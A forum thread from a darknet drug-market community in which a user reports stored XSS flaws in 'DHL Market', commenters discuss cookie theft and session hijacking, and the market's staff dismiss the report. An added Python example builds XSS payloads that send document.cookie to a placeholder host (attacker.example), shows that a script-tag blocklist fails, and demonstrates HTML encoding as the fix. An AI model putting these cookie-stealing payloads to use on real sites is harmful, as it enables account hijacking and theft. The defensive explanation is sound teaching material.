DHL Market Security Vulnerabilities

Took a look at DHL Market. Some rather obvious bugs in their website. Details here:

https://gist.github.com/anonymous/f38115e9e8318fda2f89961503f31777

Hilarity when I reported the bug to support and it triggered another XSS vuln there.

Some of their req parameters seem very iffy, and it wouldn't surprise me to find a lot more there - but I don't have time to dig deep at the moment (and would have to break out the captcha solver).


Comments


[43 Points] Clix828:

Word, thank you /u/t0mcheck, you are a highly valued asset to this community.
I hope you are being compensated for the bug bounty.


[19 Points] datadotzip:

For anyone not technically inclined: these are -very- easy (and very dangerous) vulnerabilities to exploit. This is web security 101. Law enforcement will have known about this for a while now. Especially the persistent XSS in PGP/support is dangerous. It is bad because this would allow a 'call home' (via JS) to a server that (for example) OP controls containing the cookie data of the support person (potentially an administrator-privileged account). This would allow him to sign in while that session is valid, effectively hijacking the market.

The PGP one is bad, because if you visit that vendors profile, the same attack could happen to your session, and they could siphon off your BTC balance.

Stay woke boys. Remember, that slider should be waaaay the fuck up to high.


[15 Points] JburnaDNM:

O where art thou, Agora? The days when gentlemen could buy drugs without bugs.


[7 Points] None:

Hold on, if a vendor uses js/xss in their pgp on their public profile, will it execute? That is super hilarious. Did they even try? Also dangerous.


[6 Points] PM_UR_DNM_TAKEDOWNS:

These are critical vulnerabilities.

LE could send a bunch of people a DHL link that has an xss to js 0day or beef script.

Always have js disabled.


[4 Points] AI-Bourne:

Have you tried RegEx vectors? I bet most websites will fail a RegEx attack.


[5 Points] DHL-3:

This only works in theory with javascript enabled, which is a big NO-NO around here. Also this is old news and we commented on this 2 years ago already. There are also forum threads about it.

I challenge you to change these facts:

No stolen funds in 2+ years. No hacked users or vendors in 2+ years. Maybe 10 or less phished users in 2+ years. Change a line of code on our server. Good luck! Find out our IP(s). Good luck!

This is FUD. And for FUD we don't pay bounties. Get serious or get a job bro.

EDIT: Admin told me to add this: You really took the time to upload a nice description in the form of a gist, which is very refreshing. We applaud that. You seem to be serious, in spite of the lots of other timewasters we are dealing with. Please PM SeriousSam for a token of appreciation. Thanks.


[2 Points] undercover_anarchist:

Is it true that /u/t0mcheck's bug was already described in the forums previously? Yes. But whether you pay him for finding the bug or not is your choice; there is, however, a more important aspect to this.

/u/t0mcheck's bug is still as valid now as it was 2 years ago. It has the potential to cause serious damage, perhaps not a full-size hack, but damage nonetheless.

DHL claims that this shouldn't be of concern because we should have NoScript on always. That doesn't absolve them of the problem. Most people don't know very much about any of this underlying technology, and some people forget. Of course their errors are their own fault, but not caring for other people is simply mean.

The next point is, if you've known this bug for 2 years why haven't you fixed it? What the fuck. 2 whole fucking years and all you did was brush it under the carpet as "trivial"? It shouldn't be difficult to fix if you know. If you don't, maybe do some more research and re-open the site in a year. A good market will always make money.

This is EXACTLY the kind of mentality that gets markets hacked or seized. Granted, this problem doesn't appear to have caused much damage, but this mentality of brushing shit under the rug and leaving markets with bugs is what has caused the demise of others. I don't even get what the fuss is about, just fucking fix it. Since when the fuck do we have to start telling markets to fix their own bugs? You should be fixing your own goddamn bugs if you know about them; I can at least understand ones you don't know about. It's fucking amazing that a market intentionally doesn't fix their own bugs. These market admins are turning into kindergartners!


[3 Points] None:

/u/DHL-1 /u/DHL-2


[4 Points] datadotzip:

I love how /u/DHL-3's defense is "oh we've known about this for long". lmao, let's assume that's true, how does that improve the situation at all?


[3 Points] Atrophried:

Cheers for this, if anything it allows people like me to see how market staff respond to security vulnerabilities (the comments are mind-blowing).

With the recent incidents regarding AB and Hansa, if he/she thinks that being proud of taking a risk gets them customers they must be proper thick.


[2 Points] kyousaya4life:

The persistent XSS in the PGP key is just disturbing; when I was fucking around with PHP in 9th grade I at least knew to use its htmlents() (or whatever that function is called) on user inputs. Whoever made this is in no way, shape, or form qualified to run a market. Run away like your life depends on it, because it probably does.
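The two things this thread keeps circling back to are the attack datadotzip describes (stored JavaScript in a profile field calling home with the viewer's cookies) and the fix kyousaya4life alludes to (HTML-entity encoding of user input before it is rendered). The following Python is an added example written for this page; it is not code from the market or from anyone in the thread. It renders a vendor profile three ways: the vulnerable concatenation, a tag-blocklist "fix" that a lot of sites reach for first, and proper output encoding, then runs a small parser over each result to report anything that would execute. The PGP key is placeholder text, not a real key, and attacker.example is a placeholder host.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample inputs (not taken from the thread or the market). The PGP
# "key material" is placeholder text, not a real key.
LEGIT_PGP_KEY = (
    "-----BEGIN PGP PUBLIC KEY BLOCK-----\n"
    "mQENBExampleKeyMaterialOnly==\n"
    "-----END PGP PUBLIC KEY BLOCK-----"
)

# The stored payload datadotzip describes: script that calls home with the
# viewer's cookies. attacker.example is a placeholder host.
SCRIPT_PAYLOAD = (
    LEGIT_PGP_KEY
    + "\n<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"
)

# Same goal without a <script> tag, to show that a tag blocklist is not a fix.
ONERROR_PAYLOAD = (
    LEGIT_PGP_KEY
    + "\n<img src=x onerror=\"fetch('https://attacker.example/c?'+document.cookie)\">"
)

TEMPLATE = "<h1>Vendor {vendor}</h1>\n<pre class=\"pgp\">{key}</pre>"


def render_vulnerable(vendor: str, pgp_key: str) -> str:
    """Stored XSS: user-controlled text concatenated straight into HTML."""
    return TEMPLATE.format(vendor=vendor, key=pgp_key)


def render_blocklist(vendor: str, pgp_key: str) -> str:
    """A common non-fix: strip <script> elements and nothing else."""
    cleaned = re.sub(r"(?is)<script.*?</script>", "", pgp_key)
    return TEMPLATE.format(vendor=vendor, key=cleaned)


def render_hardened(vendor: str, pgp_key: str) -> str:
    """Output encoding for an HTML text node (the htmlentities() equivalent):
    & < > " ' become entities, so the browser never sees a tag boundary."""
    return TEMPLATE.format(
        vendor=html.escape(vendor, quote=True),
        key=html.escape(pgp_key, quote=True),
    )


class ActiveContentFinder(HTMLParser):
    """Collects what would execute when the document is rendered: <script>
    elements, on* event-handler attributes, and javascript: URLs."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("<script> element")
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.findings.append(f"<{tag} {name}=...> event handler")
            if value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"<{tag} {name}=javascript:...> URL")


def active_content(document: str) -> list[str]:
    """Return the list of executable constructs found in rendered HTML."""
    finder = ActiveContentFinder()
    finder.feed(document)
    finder.close()
    return finder.findings


def main() -> None:
    renderers = [("vulnerable", render_vulnerable),
                 ("blocklist", render_blocklist),
                 ("hardened", render_hardened)]
    payloads = [("script", SCRIPT_PAYLOAD), ("onerror", ONERROR_PAYLOAD)]
    for label, render in renderers:
        for payload_name, payload in payloads:
            page = render("vendor42", payload)
            print(f"{label:10} {payload_name:8} -> "
                  f"{active_content(page) or 'no active content'}")


if __name__ == "__main__":
    main()
```

The blocklist renderer is there because the thread's "we've known for two years" line suggests the field was never encoded, and the first thing most teams try is stripping `<script>`; the `onerror` payload gets straight through that. Encoding the value for the context it lands in (here, an HTML text node inside `<pre>`) keeps the armored key readable and removes the tag boundary entirely. Marking the session cookie `HttpOnly` would keep `document.cookie` out of reach of this particular payload, but it is a second line of defence only: injected script can still issue requests as the logged-in support user, so the encoding is the fix.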


[1 Points] pooperpantsdnm:

Wow, this doesn't look good at all. Too bad I can't even get onto that market anyway bahahaha


[1 Points] ItsAllJustPretend:

OP, which of the current markets have you looked at and looked safe to you?

It's great you're finding the flaws in the 2 markets you posted about, but if you haven't looked at say, TR, Wallstreet, Dream, and they have even bigger glaring security flaws, then it would only hurt the DNM users more to flood onto those. Having some assurance of the safety of certain markets (i.e. has been vetted) would be really helpful.


[1 Points] _Dreadz:

Looks like it's time to fire up PARROT OS and have a look around. Any pointers on where to embark, big homie?


[1 Points] b1ack-spyd3r:

You reported these bugs to the market admins and gave them time to go offline/fix before you posted publicly, right? Then if they don't, not your problem, post publicly. Not assuming, just asking. I mean these are brutal and very simple vulns that shouldn't be there, but I'd hate to think buyers are gonna be in deep water because of this, more or less past buyers rather than future.

But kudos and thanks for doing some work for the community. One of these days I'll start probing them.

Baffles me that these markets aren't probing their own pages.


[1 Points] mydnthrowaway:

Have you examined trade route and cgmc?


[-2 Points] elfer90:

another one bites the dust